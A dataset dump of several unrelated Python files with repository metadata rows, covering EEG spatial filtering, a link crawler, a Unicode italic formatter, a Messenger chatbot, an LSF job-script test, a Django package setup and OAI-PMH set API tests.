filters = np.matmul(M, filters)
return filters
def apply_filters(raw, filters, prefix="ssd"):
"""Apply spatial filters on continuous data.
Parameters
----------
raw : instance of Raw
Raw instance with signals to be spatially filtered.
filters : array, 2-D
Spatial filters as computed by SSD.
prefix : string | None
Prefix for renaming channels for disambiguation. If None: "ssd"
is used.
Returns
-------
raw_projected : instance of Raw
Raw instance with projected signals as traces.
"""
raw_projected = raw.copy()
components = filters.T @ raw.get_data()
nr_components = filters.shape[1]
raw_projected._data = components
ssd_channels = ["%s%i" % (prefix, i + 1) for i in range(nr_components)]
mapping = dict(zip(raw.info["ch_names"], ssd_channels))
mne.channels.rename_channels(raw_projected.info, mapping)
raw_projected.drop_channels(raw_projected.info["ch_names"][nr_components:])
return raw_projected
def compute_patterns(cov_signal, filters):
"""Compute spatial patterns for a specific covariance matrix.
Parameters
----------
cov_signal : array, 2-D
Covariance matrix of the signal contribution.
filters : array, 2-D
Spatial filters as computed by SSD.
Returns
-------
patterns : array, 2-D
Spatial patterns.
"""
top = cov_signal @ filters
bottom = (filters.T @ cov_signal) @ filters
patterns = top @ np.linalg.pinv(bottom)
return patterns
def run_ssd(raw, peak, band_width):
"""Wrapper for compute_ssd with standard settings for definining filters.
Parameters
----------
raw : instance of Raw
Raw instance with signals to be spatially filtered.
peak : float
Peak frequency of the desired signal contribution.
band_width : float
Spectral bandwidth for the desired signal contribution.
Returns
-------
filters : array, 2-D
Spatial filters as computed by SSD, each column = 1 spatial filter.
patterns : array, 2-D
Spatial patterns, with each pattern being a column vector.
"""
signal_bp = [peak - band_width, peak + band_width]
noise_bp = [peak - (band_width + 2), peak + (band_width + 2)]
noise_bs = [peak - (band_width + 1), peak + (band_width + 1)]
filters, patterns = compute_ssd(raw, signal_bp, noise_bp, noise_bs)
return filters, patterns
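# Band layout derived from run_ssd above: for peak=10 Hz and band_width=2 Hz
# the signal band is 8-12 Hz, the noise band-pass is 6-14 Hz and the noise
# band-stop is 7-13 Hz, so the noise covariance is estimated from the 1 Hz
# flanks on either side of the signal band.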
def compute_ssd(raw, signal_bp, noise_bp, noise_bs):
"""Compute SSD for a specific peak frequency.
Parameters
----------
raw : instance of Raw
Raw instance with signals to be spatially filtered.
signal_bp : tuple
Pass-band for defining the signal contribution. E.g. (8, 13)
noise_bp : tuple
Pass-band for defining the noise contribution.
noise_bs : tuple
Stop-band for defining the noise contribution.
Returns
-------
filters : array, 2-D
Spatial filters as computed by SSD, each column = 1 spatial filter.
patterns : array, 2-D
Spatial patterns, with each pattern being a column vector.
"""
iir_params = dict(order=2, ftype="butter", output="sos")
# bandpass filter for signal
raw_signal = raw.copy().filter(
l_freq=signal_bp[0],
h_freq=signal_bp[1],
method="iir",
iir_params=iir_params,
verbose=False,
)
# bandpass filter for noise
raw_noise = raw.copy().filter(
l_freq=noise_bp[0],
h_freq=noise_bp[1],
method="iir",
iir_params=iir_params,
verbose=False,
)
# bandstop filter for noise (l_freq > h_freq tells MNE to apply a band-stop)
raw_noise = raw_noise.filter(
l_freq=noise_bs[1],
h_freq=noise_bs[0],
method="iir",
iir_params=iir_params,
verbose=False,
)
# compute covariance matrices for signal and noise contributions
if raw_signal._data.ndim == 3:
cov_signal = mne.compute_covariance(raw_signal, verbose=False).data
cov_noise = mne.compute_covariance(raw_noise, verbose=False).data
elif raw_signal._data.ndim == 2:
cov_signal = np.cov(raw_signal._data)
cov_noise = np.cov(raw_noise._data)
# compute spatial filters
filters = compute_ged(cov_signal, cov_noise)
# compute spatial patterns
patterns = compute_patterns(cov_signal, filters)
return filters, patterns
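# Illustrative end-to-end sketch (file name and component count are
# assumptions, not part of this module):
# raw = mne.io.read_raw_fif("sample_raw.fif", preload=True)
# filters, patterns = run_ssd(raw, peak=10.0, band_width=2.0)
# raw_ssd = apply_filters(raw, filters[:, :5])  # keep the 5 strongest components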
| 28.741935 | 79 | 0.654321 | 832 | 6,237 | 4.75601 | 0.259615 | 0.036391 | 0.01769 | 0.024766 | 0.357341 | 0.332575 | 0.284559 | 0.230983 | 0.221127 | 0.203437 | 0 | 0.017384 | 0.243707 | 6,237 | 216 | 80 | 28.875 | 0.821497 | 0.458874 | 0 | 0.171053 | 0 | 0 | 0.025271 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.065789 | false | 0 | 0.039474 | 0 | 0.171053 | 0.013158 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
7753a20884a3492ea6c203f075fc2f278a5bdeed | 378 | py | Python | appendix/webcrawler.using.python/bjfu1.py | royqh1979/programming_with_python | 7e1e8f88381151b803b6ae6ebda9809d9cc6664a | [
"MIT"
] | 5 | 2019-03-06T12:28:47.000Z | 2022-01-06T14:06:02.000Z | appendix/webcrawler.using.python/bjfu1.py | royqh1979/programming_with_python | 7e1e8f88381151b803b6ae6ebda9809d9cc6664a | [
"MIT"
] | 6 | 2021-02-02T22:40:49.000Z | 2022-03-12T00:27:54.000Z | appendix/webcrawler.using.python/bjfu1.py | royqh1979/programming_with_python | 7e1e8f88381151b803b6ae6ebda9809d9cc6664a | [
"MIT"
] | 4 | 2019-03-06T14:29:25.000Z | 2020-06-02T15:16:40.000Z | from requests_html import HTMLSession, HTMLResponse
from urllib import parse
session = HTMLSession()
r : HTMLResponse = session.get("http://www.bjfu.edu.cn")
page = r.html
for link in page.links:
print(link)
links = page.find("a")
for link in links:
full_url = parse.urljoin(r.url,link.attrs['href'])
title = link.attrs.get('title','')
print(full_url, title) | 23.625 | 56 | 0.701058 | 57 | 378 | 4.596491 | 0.526316 | 0.053435 | 0.068702 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.156085 | 378 | 16 | 57 | 23.625 | 0.821317 | 0 | 0 | 0 | 0 | 0 | 0.084433 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
7753daae2df4a2fae00adfc29f48ff1084199a78 | 4,015 | py | Python | main/helpers/strformat.py | IanVermes/recompose | e675af59930ae2d45ec054dfa0d0ebc85383c669 | [
"MIT"
] | null | null | null | main/helpers/strformat.py | IanVermes/recompose | e675af59930ae2d45ec054dfa0d0ebc85383c669 | [
"MIT"
] | null | null | null | main/helpers/strformat.py | IanVermes/recompose | e675af59930ae2d45ec054dfa0d0ebc85383c669 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf8 -*-
"""Various string formatting tools for Recompose
Funcs:
makeItalic
Copyright: Ian Vermes 2019
"""
import unicodedata
def makeItalic(string):
"""Convert a string into an italic equivalent.
Accented letters are escaped to the Unicode empty box character. Whitespace
characters are converted to visible characters. Punctuation is kept the same.
"""
fill = FILL_CHR # Empty box.
new_string = []
for char in string:
try:
new_char = ITALIC_LETTER_MAP[char]
except KeyError:
if char in WHITESPACE_CHR_MAP:
new_char = WHITESPACE_CHR_MAP[char]
elif unicodedata.category(char) in PUNCTUATION_CAT_SET:
new_char = char
else:
new_char = fill
new_string.append(new_char)
new_string = "".join(new_string)
return new_string
def _get_font_letters(ord_CAP_A):
mapping = {}
for ord in range(ord_CAP_A, ord_CAP_A + 52):
new_char = chr(ord)
if not new_char.isprintable():
msg = "Could not map '{}' to font equivalent."
raise RuntimeError(msg.format(new_char))
_, value = unicodedata.decomposition(new_char).split(" ")
primitive_ord = int(value, base=16)
mapping[chr(primitive_ord)] = new_char
return mapping
def _get_font_digits(ord_ZERO):
mapping = {}
for ord in range(ord_ZERO, ord_ZERO + 10):
new_char = chr(ord)
if not new_char.isprintable():
msg = "Could not map '{}' to font equivalent."
raise RuntimeError(msg.format(new_char))
_, value = unicodedata.decomposition(new_char).split(" ")
primitive_ord = int(value, base=16)
mapping[chr(primitive_ord)] = new_char
return mapping
def _fallback_letter_mapping():
fallback_A = ord("A")
fallback_a = ord("a")
ascii_chars = [chr(i) for i in range(fallback_A, fallback_A + 26)]
ascii_chars += [chr(i) for i in range(fallback_a, fallback_a + 26)]
return {char: char for char in ascii_chars}
def _fallback_digit_mapping():
fallback_ZERO = ord("0")
ascii_chars = [chr(i) for i in range(fallback_ZERO, fallback_ZERO + 10)]
return {char: char for char in ascii_chars}
def _get_best_italic_mapping():
# Get the letter mapping:
for font, ord_A in _FONT_A_POINTS:
try:
mapping = _get_font_letters(ord_CAP_A=ord_A)
except RuntimeError:
mapping = {}
letter_font = None
if mapping:
letter_font = font
break
# Match a numerical font with the letter font
if letter_font is not None:
for font, ord_ZERO in _FONT_ZERO_POINTS.items():
if font in letter_font:
num_map = {}
else:
try:
num_map = _get_font_digits(ord_ZERO)
except RuntimeError:
num_map = {}
if num_map:
break
else:
num_map = {}
# Fallback if things went wrong
if not mapping:
mapping = _fallback_letter_mapping()
if not num_map:
num_map = _fallback_digit_mapping()
# Add num_map options to main mapping:
for char_orig, char_font in num_map.items():
mapping[char_orig] = char_font
return mapping
# Order as desired.
_FONT_A_POINTS = [(2, "MATHEMATICAL BOLD ITALIC", 119912),
(0, "MATHEMATICAL SANS-SERIF BOLD ITALIC", 120380),
(3, "MATHEMATICAL ITALIC", 119860),
(1, "MATHEMATICAL SANS-SERIF ITALIC", 120328)]
_FONT_A_POINTS = [(font, ord_A) for i, font, ord_A in sorted(_FONT_A_POINTS)]
_FONT_ZERO_POINTS = {"MATHEMATICAL BOLD": 120782,
"MATHEMATICAL SANS-SERIF BOLD": 120812}
FILL_CHR = chr(9633) # Empty Box
ITALIC_LETTER_MAP = _get_best_italic_mapping()
WHITESPACE_CHR_MAP = {" ": chr(183), "\n": chr(182), "\t": chr(8677)}
PUNCTUATION_CAT_SET = set("Pc Pd Pe Pf Pi Po Ps Sk".split())
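# Illustrative behaviour of makeItalic (the exact glyphs depend on which
# mathematical alphabet is printable on this platform; the fallback keeps
# plain ASCII letters and digits unchanged):
# makeItalic("Hello World\t2019") maps letters/digits to the chosen font,
# " " -> chr(183), "\t" -> chr(8677), "\n" -> chr(182), and any character
# without a mapping (e.g. accented letters) -> the empty box chr(9633).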
| 30.884615 | 79 | 0.615442 | 524 | 4,015 | 4.45229 | 0.269084 | 0.039006 | 0.012002 | 0.018003 | 0.308187 | 0.291042 | 0.253322 | 0.253322 | 0.253322 | 0.208315 | 0 | 0.026381 | 0.291905 | 4,015 | 129 | 80 | 31.124031 | 0.794231 | 0.124782 | 0 | 0.388889 | 0 | 0 | 0.075266 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.011111 | 0 | 0.144444 | 0.022222 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
7756408f9dee762532b11db43ec36c8b48b1a6a7 | 6,447 | py | Python | main.py | ratanawang/Dentaku | 67f39a2d297b0bbd6b468ea6f2dd7a65683a0f5a | [
"MIT"
] | null | null | null | main.py | ratanawang/Dentaku | 67f39a2d297b0bbd6b468ea6f2dd7a65683a0f5a | [
"MIT"
] | null | null | null | main.py | ratanawang/Dentaku | 67f39a2d297b0bbd6b468ea6f2dd7a65683a0f5a | [
"MIT"
] | null | null | null | import json
import sys
import firebase_admin
from firebase_admin import credentials
from firebase_admin import firestore
from fbchat import log, Client
import os
from fbchat import Message
from fbchat.models import *
import traceback
from datetime import datetime
import time
from fbchat import ThreadType
from fbchat import TypingStatus
import importlib
database = {}
# Subclass fbchat.Client and override required methods
class dentaku_bot(Client):
def onMessage(self, author_id, message_object, thread_id, thread_type, **kwargs):
global database
if database['testing'].lower() == "y" and thread_type != ThreadType.USER:
return
if "!" in str(message_object.text)[0] and len(message_object.text) > 1:
client.setTypingStatus(
TypingStatus.TYPING, thread_id=thread_id, thread_type=thread_type
)
message = str(message_object.text).replace("!", "").split(" ")
print(message)
if message == ['']:
return
command_index = 1
if message[0] == '':
for each in message:
if each != '':
command = each
break
command_index += 1
else:
command = message[0]
try:
parameters = {
"user": message[command_index:],
"author_id": author_id,
"message_object": message_object,
"thread_id": thread_id,
"thread_type": thread_type,
"database": database,
"gdb": gdb
}
command = command.lower()
module = importlib.import_module(".." + command, "commands.subpkg")
new_command = getattr(module, command)
instance = new_command(parameters, client=self)
instance.process()
except ModuleNotFoundError:
print(traceback.format_exc())
self.send(
Message(text="Command not found."),
thread_id=thread_id,
thread_type=thread_type,
)
except Exception as e:
self.send(
Message(text="Error: " + traceback.format_exc()),
thread_id=thread_id,
thread_type=thread_type,
)
else:
for word in keywords.keys():
if word.lower() in message_object.text.lower():
try:
parameters = {
"author_id": author_id,
"message_object": message_object,
"thread_id": thread_id,
"thread_type": thread_type,
"database": database,
"gdb": gdb
}
module = importlib.import_module(".." + keywords[word], "keywords.subpkg")
new_command = getattr(module, keywords[word])
instance = new_command(parameters, client=self)
instance.run()
except ModuleNotFoundError:
self.send(
Message(text="Keyword did not map to an existing python module."),
thread_id=thread_id,
thread_type=thread_type,
)
except Exception as e:
self.send(
Message(text="Error: " + traceback.format_exc()),
thread_id=thread_id,
thread_type=thread_type,
)
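# Commands are resolved dynamically: a message "!foo bar" imports
# commands/subpkg/foo.py, instantiates the class foo(parameters, client=self)
# and calls process(); keyword handlers work the same way via
# keywords/subpkg/<name>.py and run(). Minimal sketch of an assumed command
# module (commands/subpkg/echo.py, illustrative only):
# class echo:
#     def __init__(self, parameters, client=None):
#         self.parameters = parameters
#         self.client = client
#     def process(self):
#         self.client.send(Message(text=" ".join(self.parameters["user"])),
#                          thread_id=self.parameters["thread_id"],
#                          thread_type=self.parameters["thread_type"])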
def export_env():
with open("export.sh", "r") as file_in:
for line in file_in:
if "\"" in line:
os.environ[line.split("=")[0].split(" ")[1]] = line[line.find("\"") + 1:line.rfind("\"")]
else:
line = line.replace("export", "").replace(" ", "")
line = line.split("=")
os.environ[line[0]] = line[1]
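# Assumed export.sh format handled by export_env() (illustrative values only):
# export EMAIL="bot@example.com"
# export PASSWORD="secret"
# export G_CREDENTIALS=/path/to/service-account.json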
export_env()
client = dentaku_bot(os.getenv('EMAIL'), os.getenv('PASSWORD'))
if os.path.exists("database.json"):
with open("database.json", 'r') as file:
try:
database = json.load(file)
except json.decoder.JSONDecodeError:
print("JSON file is invalid. Repair or delete database.json.")
sys.exit()
if 'deployment' in database:
database['deployment'] += 1
else:
database['deployment'] = 0
database['last_deployment_time'] = time.time()
with open('database.json', 'w') as file:
json.dump(database, file)
else:
database = {"deployment": 0, "subscription": []}
with open('database.json', 'w') as file:
json.dump(database, file)
if os.path.exists("keywords.json"):
with open("keywords.json", 'r') as file:
try:
keywords = json.load(file)
except json.decoder.JSONDecodeError:
print("JSON file is invalid. Repair or delete keywords.json.")
else:
keywords = {}
with open('keywords.json', 'w') as file:
json.dump(keywords, file)
if 'testing' not in database:
print("Testing mode will restrict all bot interactions to direct messages, or ThreadType.USER.")
database['testing'] = input("Turn on testing mode? (y/n): ")
if input("Save this decision? (y/n): ").lower() == 'y':
with open('database.json', 'w') as file:
json.dump(database, file)
print("Decision saved to database.json with the key 'testing'")
else:
print("Testing mode is currently " + ("on" if database['testing'].lower() == 'y' else 'off'))
print("Mode is saved in database.json")
for thread in database['subscription']:
client.send(Message(
text="[" + datetime.now().strftime("%Y-%m-%d %-I:%M %p") + "] Dentaku deployed just now. #" + str(
database['deployment'])),
thread_id=thread, thread_type=ThreadType.USER)
if 'G_CREDENTIALS' in os.environ:
cred = credentials.Certificate(os.environ['G_CREDENTIALS'])
firebase_admin.initialize_app(cred)
gdb = firestore.client()
else:
gdb = None
client.listen()
| 37.701754 | 106 | 0.52443 | 655 | 6,447 | 5.048855 | 0.241221 | 0.051406 | 0.067735 | 0.043544 | 0.323858 | 0.275779 | 0.270033 | 0.242213 | 0.231327 | 0.231327 | 0 | 0.00341 | 0.363115 | 6,447 | 170 | 107 | 37.923529 | 0.801997 | 0.008066 | 0 | 0.36129 | 0 | 0 | 0.149539 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.012903 | false | 0.006452 | 0.109677 | 0 | 0.141935 | 0.051613 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
775a861eece660969f39947eb4baee777235fec5 | 1,859 | py | Python | tests/adaptors/lsf/test_lsf_adaptor.py | Abdullah-Ghani/radical.saga | bb9d9bd97905627b9bf45a85c6d1d6a60ca9fb39 | [
"MIT"
] | null | null | null | tests/adaptors/lsf/test_lsf_adaptor.py | Abdullah-Ghani/radical.saga | bb9d9bd97905627b9bf45a85c6d1d6a60ca9fb39 | [
"MIT"
] | null | null | null | tests/adaptors/lsf/test_lsf_adaptor.py | Abdullah-Ghani/radical.saga | bb9d9bd97905627b9bf45a85c6d1d6a60ca9fb39 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
__author__ = 'Ioannis Paraskevakos'
__copyright__ = 'Copyright 2018-2019, The SAGA Project'
__license__ = 'MIT'
'''
This test tests the LSF script generator function as well as the LSF adaptor
'''
import unittest
import radical.saga.url as surl
import radical.saga as rs
from radical.saga.adaptors.lsf.lsfjob import _lsfscript_generator
# ------------------------------------------------------------------------------
#
def test_lsfscript_generator():
smt = 4
url = surl.Url('gsissh://summit.ccs.ornl.gov')
jd = rs.job.Description()
jd.name = 'Test'
jd.executable = '/bin/sleep'
jd.arguments = 60
jd.environment = {'test_env': 15}
jd.output = 'output.log'
jd.error = 'error.log'
jd.queue = 'normal-queue'
jd.project = 'TestProject'
jd.wall_time_limit = 70
jd.total_cpu_count = 65 * smt
tgt_script = '\n#!/bin/bash \n' \
+ '#BSUB -q normal-queue \n' \
+ '#BSUB -J Test \n' \
+ '#BSUB -W 1:10 \n' \
+ '#BSUB -o output.log \n' \
+ '#BSUB -e error.log \n' \
+ '#BSUB -P TestProject \n' \
+ '#BSUB -nnodes 2 \n' \
+ "#BSUB -alloc_flags 'gpumps smt4' \n" \
+ '\n' \
+ 'export RADICAL_SAGA_SMT=%d test_env=15\n' % smt \
+ '/bin/sleep 60'
script = _lsfscript_generator(url=url, logger=None, jd=jd,
ppn=None, lsf_version=None, queue=None)
assert (script == tgt_script)
# ------------------------------------------------------------------------------
#
if __name__ == '__main__':
test_lsfscript_generator()
# ------------------------------------------------------------------------------
| 27.746269 | 80 | 0.467994 | 195 | 1,859 | 4.25641 | 0.482051 | 0.048193 | 0.040964 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019727 | 0.291017 | 1,859 | 66 | 81 | 28.166667 | 0.610015 | 0.138246 | 0 | 0 | 0 | 0 | 0.268696 | 0.018531 | 0 | 0 | 0 | 0 | 0.026316 | 1 | 0.026316 | false | 0 | 0.105263 | 0 | 0.131579 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
775ac367626f1aa9586832636fbfee895d196274 | 1,159 | py | Python | setup.py | froddd/govuk_template_django | e0792013c260b4c9b66486fc779be372e1e45377 | [
"MIT"
] | null | null | null | setup.py | froddd/govuk_template_django | e0792013c260b4c9b66486fc779be372e1e45377 | [
"MIT"
] | null | null | null | setup.py | froddd/govuk_template_django | e0792013c260b4c9b66486fc779be372e1e45377 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import os
from setuptools import setup, find_packages
sdict = dict(
name = 'django-govuk-template',
packages = find_packages(),
version = '0.16.0',
description = 'Django packaged version of the GOV.UK template',
long_description = 'A base template for Government Digital Services',
url = 'https://github.com/alphagov/govuk_template',
author = 'Government Digital Service developers (https://gds.blog.gov.uk/)',
author_email = 'fred.marecesche@digital.justice.gov.uk',
maintainer = 'Fred Marecesche',
maintainer_email = 'fred.marecesche@digital.justice.gov.uk',
keywords = ['python', 'django', 'alphagov', 'govuk'],
license = 'MIT',
include_package_data = True,
install_requires = [
'django>=1.3'
],
platforms=["any"],
classifiers=[
'Programming Language :: Python',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Development Status :: 3 - Alpha',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'Topic :: Software Development :: Libraries :: Python Modules',
]
)
setup(**sdict)
| 31.324324 | 78 | 0.689387 | 133 | 1,159 | 5.93985 | 0.616541 | 0.025316 | 0.048101 | 0.065823 | 0.096203 | 0.096203 | 0.096203 | 0 | 0 | 0 | 0 | 0.007261 | 0.168248 | 1,159 | 36 | 79 | 32.194444 | 0.812241 | 0.017256 | 0 | 0 | 0 | 0 | 0.538664 | 0.085237 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.09375 | 0 | 0.09375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
775ebac144774000350d5090b530d9ac825e6807 | 8,710 | py | Python | tests/resources/test_resources_oai.py | inveniosoftware/invenio-datacite | d25e3670b74f132390fc42e5647765ae5c605ef3 | [
"MIT"
] | null | null | null | tests/resources/test_resources_oai.py | inveniosoftware/invenio-datacite | d25e3670b74f132390fc42e5647765ae5c605ef3 | [
"MIT"
] | null | null | null | tests/resources/test_resources_oai.py | inveniosoftware/invenio-datacite | d25e3670b74f132390fc42e5647765ae5c605ef3 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Copyright (C) 2022 Graz Univeresity of Technology.
#
# Invenio-RDM-Records is free software; you can redistribute it and/or modify
# it under the terms of the MIT License; see LICENSE file for more details.
"""OAI-PMH resource level tests."""
import pytest
from flask import current_app
from invenio_oaiserver.errors import OAISetSpecUpdateError
def _create_set(client, data, headers, status_code):
"""Send POST request."""
s = client.post(
'/oaipmh/sets',
headers=headers,
json=data,
)
assert s.status_code == status_code
return s
def _get_set(client, id, headers, status_code):
"""Send GET request."""
s = client.get(
f'/oaipmh/sets/{id}',
headers=headers,
)
assert s.status_code == status_code
return s
def _update_set(client, id, data, headers, status_code):
"""Send PUT request."""
s = client.put(
f'/oaipmh/sets/{id}',
headers=headers,
json=data,
)
assert s.status_code == status_code
return s
def _delete_set(client, id, headers, status_code):
"""Send DELETE request."""
s = client.delete(
f'/oaipmh/sets/{id}',
headers=headers,
)
assert s.status_code == status_code
return s
def _search_sets(client, query, headers, status_code):
s = client.get(
'/oaipmh/sets',
headers=headers,
query_string=query,
)
assert s.status_code == status_code
return s
def _search_formats(client, headers, status_code):
s = client.get(
'/oaipmh/formats',
headers=headers,
)
assert s.status_code == status_code
return s
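# The minimal_oai_set fixture used below is assumed to provide at least the
# keys "name", "spec", "description" and "search_pattern"; admin is assumed to
# be a user fixture whose login() call authorises the OAI-PMH endpoints.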
def test_create_set(client, admin, minimal_oai_set, headers):
"""Create a set."""
client = admin.login(client)
# without description
s1 = _create_set(client, minimal_oai_set, headers, 201).json
assert s1["name"] == minimal_oai_set["name"]
assert s1["spec"] == minimal_oai_set["spec"]
assert s1["description"] == minimal_oai_set["description"]
assert s1["search_pattern"] == minimal_oai_set["search_pattern"]
# with description
minimal_oai_set["spec"] = "s2"
minimal_oai_set["description"] = "description"
s2 = _create_set(client, minimal_oai_set, headers, 201).json
assert s2["name"] == minimal_oai_set["name"]
assert s2["spec"] == minimal_oai_set["spec"]
assert s2["description"] == minimal_oai_set["description"]
assert s2["search_pattern"] == minimal_oai_set["search_pattern"]
valid = ["-", "_", ".", "!", "~", "*", "'", "(", ")"]
for vs in valid:
s = minimal_oai_set.copy()
s["spec"] = vs
cs = _create_set(client, s, headers, 201).json
assert s["spec"] == cs["spec"]
def test_create_set_duplicate(client, admin, minimal_oai_set, headers):
"""Create two sets with same spec."""
client = admin.login(client)
_create_set(client, minimal_oai_set, headers, 201)
_create_set(client, minimal_oai_set, headers, 400)
def test_create_set_invalid_data(client, admin, minimal_oai_set, headers):
"""Try to create a set with invalid params."""
client = admin.login(client)
key = "name"
s = minimal_oai_set.copy()
s[key] *= 256
_create_set(client, s, headers, 400)
del s[key]
_create_set(client, s, headers, 400)
key = "spec"
s = minimal_oai_set.copy()
s[key] *= 256
_create_set(client, s, headers, 400)
del s[key]
_create_set(client, s, headers, 400)
invalid = [";", "/", "?", ":", "@", "&", "=", "+", "$", ",", "community-"]
for ivs in invalid:
s = minimal_oai_set.copy()
s["spec"] = ivs
_create_set(client, s, headers, 400).json
key = "search_pattern"
s = minimal_oai_set.copy()
del s[key]
_create_set(client, s, headers, 400)
def test_get_set(client, admin, minimal_oai_set, headers):
"""Retrieve a set."""
client = admin.login(client)
# without description
created_set = _create_set(client, minimal_oai_set, headers, 201).json
retrieved_set = _get_set(client, created_set["id"], headers, 200).json
assert created_set["id"] == retrieved_set["id"]
assert created_set["name"] == retrieved_set["name"]
assert created_set["spec"] == retrieved_set["spec"]
assert created_set["description"] == retrieved_set["description"]
assert created_set["search_pattern"] == retrieved_set["search_pattern"]
# with description
minimal_oai_set["spec"] = "s2"
minimal_oai_set["description"] = "description"
created_set = _create_set(client, minimal_oai_set, headers, 201).json
retrieved_set = _get_set(client, created_set["id"], headers, 200).json
assert created_set["id"] == retrieved_set["id"]
assert created_set["name"] == retrieved_set["name"]
assert created_set["spec"] == retrieved_set["spec"]
assert created_set["description"] == retrieved_set["description"]
def test_get_set_not_existing(client, admin, headers):
"""Retrieve not existing set."""
client = admin.login(client)
_get_set(client, 9001, headers, 404).json
def test_update_set(client, admin, minimal_oai_set, headers):
"""Update a set."""
client = admin.login(client)
s1 = _create_set(client, minimal_oai_set, headers, 201).json
update = minimal_oai_set.copy()
update["name"] = "updated"
update["description"] = "updated"
update["search_pattern"] = "updated"
s1_updated = _update_set(client, s1["id"], update, headers, 200).json
assert s1_updated["name"] == update["name"]
assert s1_updated["description"] == update["description"]
assert s1_updated["search_pattern"] == update["search_pattern"]
assert s1_updated["id"] == s1["id"]
assert s1_updated["spec"] == s1["spec"]
def test_update_set_invalid_data(client, admin, minimal_oai_set, headers):
"""Update a set with invalid data.
Most cases are already handled in test_create_set_invalid_data
"""
client = admin.login(client)
s1 = _create_set(client, minimal_oai_set, headers, 201).json
s = minimal_oai_set.copy()
# changing spec is not allowed
s["spec"] = "should raise an error"
with pytest.raises(OAISetSpecUpdateError):
_update_set(client, s1["id"], s, headers, 400)
# trying to set data which is read_only
s = s1.copy()
s["id"] = 200
_update_set(client, s1["id"], s, headers, 400)
s = s1.copy()
s["created"] = 200
_update_set(client, s1["id"], s, headers, 400)
s = s1.copy()
s["updated"] = 200
_update_set(client, s1["id"], s, headers, 400)
def test_delete_set(client, admin, minimal_oai_set, headers):
"""Retrieve a set."""
client = admin.login(client)
s1 = _create_set(client, minimal_oai_set, headers, 201).json
_delete_set(client, s1["id"], headers, 204)
_get_set(client, s1["id"], headers, 404)
def test_delete_set_not_existing(client, admin, headers):
"""Delete not existing set."""
client = admin.login(client)
_delete_set(client, 9001, headers, 404).json
def test_search_sets(client, admin, minimal_oai_set, headers):
"""Search sets."""
client = admin.login(client)
created_sets = []
num_sets = 4
for i in range(num_sets):
minimal_oai_set["spec"] = minimal_oai_set["name"] = f"set_{i}"
s1 = _create_set(client, minimal_oai_set, headers, 201).json
created_sets.append(s1)
search = _search_sets(client, {}, headers, 200).json
assert search["hits"]["total"] == num_sets
for i in range(num_sets):
assert search["hits"]["hits"][i]["spec"] == created_sets[i]["spec"]
assert "next" not in search["links"]
assert "prev" not in search["links"]
search = _search_sets(
client, {"size": "1", "page": "2"}, headers, 200
).json
assert "next" in search["links"]
assert "prev" in search["links"]
search = _search_sets(
client, {"sort_direction": "desc"}, headers, 200
).json
for i in range(num_sets):
assert (
search["hits"]["hits"][num_sets - 1 - i]["spec"]
== created_sets[i]["spec"]
)
def test_search_metadata_formats(client, admin, headers):
"""Retrieve metadata formats."""
client = admin.login(client)
available_formats = current_app.config.get(
"OAISERVER_METADATA_FORMATS", {}
)
search = _search_formats(client, headers, 200).json
assert search["hits"]["total"] == len(available_formats)
for hit in search["hits"]["hits"]:
assert hit["id"] in available_formats
assert hit["schema"] == available_formats[hit["id"]]["schema"]
assert hit["namespace"] == available_formats[hit["id"]]["namespace"]
